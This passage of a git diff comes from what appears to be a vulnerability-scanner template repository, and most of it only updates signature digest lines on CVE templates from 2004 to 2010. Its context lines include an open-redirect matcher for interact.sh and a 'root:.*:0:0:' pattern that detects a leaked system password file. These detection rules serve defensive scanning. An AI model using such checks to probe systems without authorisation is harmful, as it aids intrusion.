b/http/cves/2004/CVE-2004-1965.yaml index b60b71fb30..c1f874a540 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a0047304502200c6f6ff6cbea5187645a7c7ff440cb6a60b01ff1a1a763cb4e9ed83296f4471002210082d1866b9c2aac0e20a0b2d8e26652bb7a23a443673b24eaa51bc1b20660d380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200942a34b2650323617b6c0a05aed0e60c5452d3b77477cfa2760dd51678d7371022100cf0d486cba6f8042c311e7cc3134723dd8e8b86ff44b5cdb22e0adbfe3ba3776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 3dfd6d24c9..0752d90d04 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b8520088ed41f6e865f68d2bc3c88014cdf7b5941d4f2225b32b1c246baca10f022100c1c3a4dcf74387e8c384df5f5c1c65d4d46844c0531c5d7314adb1135fd17075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ce759080f0a66542cb9e9ef838c4eec1bfc1ff9f685db0a5e1b5288ec69daa6202210098c3b44c36f631ea8314785ec5f8b01f320897dbb8fbfe5549601f5dfa1cfaaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index d1e6d18919..f3c5829a6c 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205a2887a4a011d195cc34cf71a7a0747f9c287c37e0290029074917bfc3bf91af0221009d4d6050db82f4d260d632a1aeba31fc2bc837980a1c88e9b4dd4d50635b8f4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ed59822b672884f4e50ef40df983fb0862418cede91f6dc96f764425e4bf4e302205b376b90e98b64ced2421151d9636a14d0dd0830c2dee682c77cda12c602e7f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index 914d2240e6..1a29f75867 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022063c3ab85bdde986f6ecc6a7dc4c3b023729ed6261822f93adbb48cdbdc76805a022100b6565e184fe99d2814ca5f1e5250128bcb9a412480aeb5e1633dd41adaaf3dc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100860fb5fb6459c546fd88f49a316826632cf5a5f32bc9e9a5ce27dce40d150997022100b0b9ecb0467a3de0631a06e2e867b73844a98e132eef931105650d75e196e26f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 181fb47165..a2a1196510 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022056f02ed80d5fe3f78efcf57295b1bf88f9f3f30684ed4c1e3be256359987a08c022100ac892ca2c57594746d969a1e1a0e78b802404382d91a2c79e49aa7f4d4c1e6af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207688a03699896a3d8c9a6254539a13ace8813096112296d102ca74fc45a0f17b022036a518c6e517befe270990e5d1a9d992f8b19f1fa36086546a11b544ff84c692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index f6f3a28108..aee2258ec2 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210089e9b9d8a81e305a5525c94b09cbea3efb2244f688cdcc286da2a8a1a45f0158022100e3715b3c6532153024ae9aa71e9f2409a886433642805d8930de99b6b2043170:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022037e628251b17abd8fa644b564dab5c21ed475158752e510f311df96b9d63497402201bb1673e45a11edc53bdf0a83147c1a87a74c36358ede8fe0f576850c4d4900b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 044e2056b6..4d096ce1ea 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f122a2f81805e8560dced37623295f6598fda06b15a8484cdc86a9a40dc59fbd02205654c1bd9945d3ec7784092170b4c87bc47d00dbcb28549047e07ee3229f5b99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205ecbba6e0e199b46f608f16ac8f807072e05bbafa717633027622a0dda0496fe022100df4658dec4f7e3cb9a3a5a504830913ca49faea4c712f6285b50dbc2ea9d1df3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index f76cdcc1c5..28a0666dd5 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100baa8ee591c8440e6668b12c357528938dbbf22644498e33c452cc22f60aaccd70221008a9561bbba4b70a1ffd7025d54cd0280b0e3d8287aa26f643638916cf13ce84c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e337afcba9ba8a3b54040f339305e5467dbb5fda18b50da4f493484a5c5182d2022100e24c3017a7abcd267ab66ab6e255d1ed5ea56d71492bcb6afd58d3a093e618c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index a14ccefe8e..5e269daf8d 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200895a0e8d132e643a349210d71d819f5f95f0ec17602b8030ca950203d2338a1022100e8d25e5c0329c2801185ed829e44d1d0ca605178760cab92c5d3320477498671:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022063b96588b6252e04e12101a7ef9a2744b1ad191e0f2e42b4cea08a43b7e42f35022057a31c495c450ec89adc4ad386b5203ac3b15d93fe5224986eb90f9b47ca4967:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 94ca96a74e..0bce7f19c4 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205adf857f585313b44dd30eaf302b3883aa4d97143d3d1242e1b4a24c4cdb7327022100f3eb1540d5bbfa850a3242ed41ca554a5f6e74aaa82d2babb518f57624e6ddd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220233b1d67c643f2b04cc98635c1308c7fc6957ca19112156b50312a3c02301dd7022062edfca4c36a26a476f2dcbf466e092d2e1d048bd645dff71dbb23bb91ff5af5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 6ebb1fc117..4ae86e833b 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed026dab65baa9ef29ab1e768f776c1dbb4b9ff011c976794c88dc65a44c384c0220443199e8d31dec84aa20713c1a05e3ffb292a094b28f0bbfbc817ccdac642f0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c60015398304f9ce817dba9913fa3eea08043b9830cef5a4e1baeaadb99b5a0c022100d34a8d77d912dc1372e761e3ea0d4ccda3e9bcacddb4dd58752f9c53d81c8048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 99702398f8..76631b2aac 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d4e972e654e7e0fdb1c9be76571b8e58770c362f8b2a8ba7d10022812dff36102204fa02d8b876b4f57d9285491f7f158412390db3b2daf5e37d14dab7c7221c3b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200fe7f64211b0ac14e48925d06d09a65070632e86c47843b9217a84320880330d022078feaff899b6d7e68e8cc85f5dbbc923969ec1a18c3259c0bcea48559cd82b1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 5379eda054..0d5751fe14 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220083acd925279fe6edeb75107c9d2d21ccc0096ade5f9d0cdf1d01104af8c383702200dfe5e75e8c824f35e55514fde2e40756143fa538ed039b28af501f560d40401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022060c84de88a71ccf8b996bea22ac6b62a2e003d9b3b8689c2d617d3e2f1ad99bc02202c59470b8795792f83ecbf5e7c7b37395db50a218f420b0fa76f2accc49d815f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index bd1d307f24..8eaf2fb274 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502202273c4a5ca4379f451fcceb66f3f59ccdd0fba2b3efe6ddc759f20702b101b1a022100ae14fa5d00c247d628930d378967273ea99394b3e2fa6034c97d1dd3ce00fba8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ffdf11249d57dd33b3a45982e01655bacfcd643a4c57e97aa5f891243557c3b202205fd36fccfd2f9c9afdec7d8b8b4463ac9a1d07a52b558de7a68f374cbc5bc3ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index cc536e4b54..f6f14d1199 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -39,4 +39,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022008fe957e293c8ade7c0de8fa4fe27072e0e2eb0b62667c49e63adb4d607b37fd02210081746edf1edce4b1d9862186eaf406060447a5274c63c24410f3300e3e71377a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b390e617f8d9be114aea50840c529aab08fac1822e4dece7746cb7733a409631022100b30c36b38ea49931b16615862de2267a59370daf662b7e77c88b25add453fb8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index c14e99c7b8..4c4a3f433d 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100829ed00b58b2238e75daef83f1de6e16d31213baf941088102784eeb8e640543022100ca25443330153aa61b70e451f9277a0b22873d532a042bf9d49a161bf24d3a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220752ee73ce2196cc54c39a5e60377c58c87e7ef7ef489fd990d2b463b6ddd900402204885ac378662f0bf728920184aab940b6d54ebdb022e1767ebc9b7e4283d8ad1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index ca570b9b0c..b874ede337 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100859293609f445f6b38b4ec0d4bf0a5f022b03a71d4077b8ba82142e5fb47cdce022100cacfc80973dffe78bf003dc87b9535f5b9852fdf5cfbc11ba79885d961eedcdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d034c615116d4e4388066b8ecd70006fb486a97f1893f14acdd83c4b1d48a2ec02200b87edb8aa8815371b589ebc0773ca1f591ef511e9f6dfb2c4a6bdc6cfc624f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index e467eec3a7..7cfccf1119 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022019afaece2da644631e56445b78cdc6465e02321ac35c1bc6e7c16fa4ccbe33fc022100fc55a195275796660b8e10e76e806b1ff741dbb19c90c9a4567d304e8a654d5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220058c6301672453287635b209959b9ac18463e075a84677673e28deef2283f91a0221009ef0ec653e81bc72e2c7d58deff90a7f85cba1e35851c7a2ae9f20d1d9ff24d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index f46220b236..e0b1c4d4b7 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201807b741163dd35b40cf8679a5c69c28d6824129c240aed44cd27031069892a4022100f9448ff8af24fe6213e9b721a22515d4f109bdede6709aa7850816429d90cdfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220350ec03119d612c5f8713699db8e69ed0b506879bc6ee64e2d75bba83968464502204f724f9426b0b6fc4ebc02416b6f5dc37095ea0970d13a9fa55961eec88551f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index fea71dd80e..fdad6c137f 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009f6724d9f832361dcd8dcd45d95606a2c254624434324ee1b802d49ad2a3301c02200ef52ab31b0f2b38a12f14e67f45b8eb570d5b5a924bd1a24b01ce50a905c056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210099e04590b72f5f59dff9760d627e7042601a45b16bea2c23852fa76186fae5ab0220361a0788e7674d6ed82b5e924aace4e3d604f237ac2666fa79b1e91830fd2e1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index fe25445df0..8d434c3992 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b1fa98d1b097e9e59957cd724a9764b822dfedba2b3b4dd076cf77ccf2ce0ade0220596b7001a14d54b49072347281aa063f6378a56069c6f44ffc9afd59ca393866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084264e87dd97831fdd770570139d33f282ca38d9dd2d90eb80aa16ac245aade0022100a38d28caf33176434cefef437a45a72f7bce297b01a68dc9d0ffc0ec18545cda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 83bea5b3cd..68f9595bb0 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204766c1c9c32f032762afd10fe8ee84f1b653171440aa77ca4b705a3e4375838e0221008a5bb47895dbc57d2f3934ab49b0456617e0120470090e7bd632ce4a22ba222d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220011b812bacaed12772d45c7485d04136e35b9196b4c435b488601681c7bb3be50220722ab9dd33d98de09bfaec078bfd702692da5772714e412426ee37084ac9b862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index fb855b6e67..07c57fbbd7 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200990a6dabad1d60232d8d8ee75e9fe9d1123c57e25eb0125a5a4ac0759116b71022100a5ec11121f4aad236c8bcc1e4c1d27e1f3b0bb0e308762999fc790eb617dbf4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b1484271cee40bf0b4aea6f4d71ca3af8dbc80c595ae0ac214b2c4a50f9e208d02206d398d3a43e76b1fe42dd939684c2051143435d1f0dabe2491f7e7e9cf780c28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 91bc79834e..4ab40ddac3 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a0c6804b8dbd711ef112e2b985e3b35be306ec4185f65447027222dd788ea149022100a7872521ede57c3f04f929897e222299f00b280547d352b381492a65311c27e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc8b6fb22e490512109118ecf32279b8742eb0391a184c91700c91da8b4591eb022100c82312184befa6261e4804c856191e828d49e06fd6f09184837202906a4f1d4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 61d4838935..7427b9c7b7 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204f0b05d637609d6baff8d788517653e3d20f5a3249e5828c40ab5c221fcce081022100eed625b6b0b691c4258baa9fdfc7923278675ad743ff2fb17e80ad4dfe84fb74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022009e6d9fc063d9f363f1aa17a21509658c7830c53762598097f52e1f597f91c33022064ff511367ec547436041cce6d239bfe563e64bb05e8d8c7743fd1edb3d777db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index da79fb5690..cc83c7f706 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022000b4193de05aeed2d688c0fced3eea38d2e7a20e3fc498066aa35bc37886f2c8022079acc2333e2f09e209d750d5d42717f55d6102ba91b0205072968515c339da07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f1bc3fae0095bf323e677c3c93b6cdb42d839f3084ee12f9fe92a0dab609269022100b70a69e966f2e410ba5d8ed821edf339feb20ee4149b37bd66992153e4a341ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index e744f5aa94..192e0ec010 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200dc8bb905b62cc27413d13bcf68de7bceee15556afb5b99d1b98df10ef11ea0c022032f71fa14814856d330dad15879db279c8b95e5ee62ce3b993837c3dc5a7d43e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f4ff2ab58c70983fdbde0ee6860d7cb8229e81af51ace5e3e15533082c69a2d022072359ac609c3461da4901b3bb8ccaf83fcf42ccd7e480a74fec618aadba9dcfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index d339eeca95..4619ccc6cf 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201827010a50b0cdffbd66d7c97c743b79c1e91ec12d6c31b45895e3f60878c8f5022078d314e0fd5ee15339fe6e68ffd7141713a2ef41fecee2f270e38c390e24f0f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022033efcff5dab3e96c4bd25ffd1f08b5d509129b21c1952b48f4c5f5bce1845b20022100dc3da12554c6710754770645dcafc258f15112fee5ae614da245894df5d37c91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 5543fb7a36..f40d55c22e 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100959f91f23c9db239c19a6979edfde0cbfd44f60084e9ce514cb1e1c36b006e49022019b2be459430613ad21aa9e2f2ab03c306f50f762546572c6dd0e5aee3b8b7c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049a324c195808d1ac76829b45e8f27b6cd31e1527fcbe5131d00a009b78b98b7022100e3e31759811d9e4b4f7781ef77c85f6e426853daf5f1d8eaf52e966c01f8a88e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 1e348cdc19..4fab435111 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220374ff93c162963654bc49e13a4a61f51448fdb6c4348dab64ac5c609964aa13102202d2410fcd9d2038f9e46ce3cfac1531739b82c3cbe45ee615b8c54b828c40fbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203edf2b86718735a85d6b60ac6465e0d7f9aa063bbfb985ecba7fd8a82500bcc6022100a9017abad716d08a60243fdb71aed727e1b0bc2e44c3d591e200168e9f7bc182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index b0a8e64e28..ed8e98f25b 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201175c63a0d9794f4fc1b965d4db09cb9a979b5171fefd32386ccdd930a230396022100f604c3aea88d787bbb0af089e74048fa510250c28358a51de44394ad95f6e236:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d3a39a822ed7fbffac4de0f1b0254ff4507f47002fe439be08c0983ec7a8613d022100958197a26e1b207a6910133f8e31baf385295e45ef9b589a8961292891f251c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index f5b61a101e..775ecde248 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cbdf32e2c0315f089f08f26a91f81e2d4fc44af3683a72d1549869134fea0b7f02200ed04e3c0c97f378d11a2f98f9942768d5df8cfb723896c96da56064e600d7eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022063751b0bb22265abceda515f563474e54ddd0bb7bf04addcfc369c1a3c21f69c022100a2bdd7c3930a8da95f5c7e7d673fae8b107d53fd646041880a655aa9249b1ec1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index a94792550f..fefab5e854 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b991692d13aac6ff59801cd2c8d74980c9fa7501bfa087604fae7e361a345118022100d452d92f23c01cf55743f0fae361be4217a2bff5b6200b645a714cbc3de034a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a816ac69e3484194480569546383ac95a39384b1b81b2edcca4f7d78766e49d022100b824268cecc97ebb54940329e54d6aa376f07f1fb432068386894a744808661d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 1f4197d74e..e4bc052eb4 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da081b3d0fb9d6bf240437dfca64fc54d46d1739ad98bd11c994dcbaf4cf4b8f022000dcaa71d34e0621db208f731909986ed032b4baba560ef051de9558d9b78f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022078e94288c545c86d3739bfc673b0cb40d9db80ede64d7de24b9bfe1562d54d01022069a099e794e1021a4404dc94821f8840fe88456b958ec238d5edee3da0c18505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index 1f519400dd..948b56366d 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204172bb44f94938e926f0617c26a2b976fda411ab2367f9742f2be63a0843c23f022100fa7a7a98543edc462eff76623712144c295c95803cb921a5b4cc565d325e721b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb37e531453032b693abfd563eb09d145f724ef3ca1d86023b9f1b2fbe4d107e02207df22aa55b994ea2c6bb5f7823da50701a07a15cc04d87e133ca41618351011d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index 663df7257e..2b23831458 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200a152e18ad21e3ba1c1bf1d9d425e38a7e9cb0d95cc9597dbda693ce0c7794ac022100dff0ab0237f88d5dc074a6db02d5f69b185ae322811cb8de97f5343bf3fefc68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d3cb43212c8a3df17ee31855688e3d652f5314ee4124a7bd521c42f1982d460502201239ce976e80c6e0076a2883ce41cb8bd687c8176e3c5073b2239895d476ebdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 8812b6095c..28fd60e49b 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a634288086cf303de0064cc6f44c7d17c5ed78c6dc69d1758b4bc6f6e79e0a4b022100dbd65694a8d40dafcd826434d64067304e7b73a13cfa1ccd347c860563eee573:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 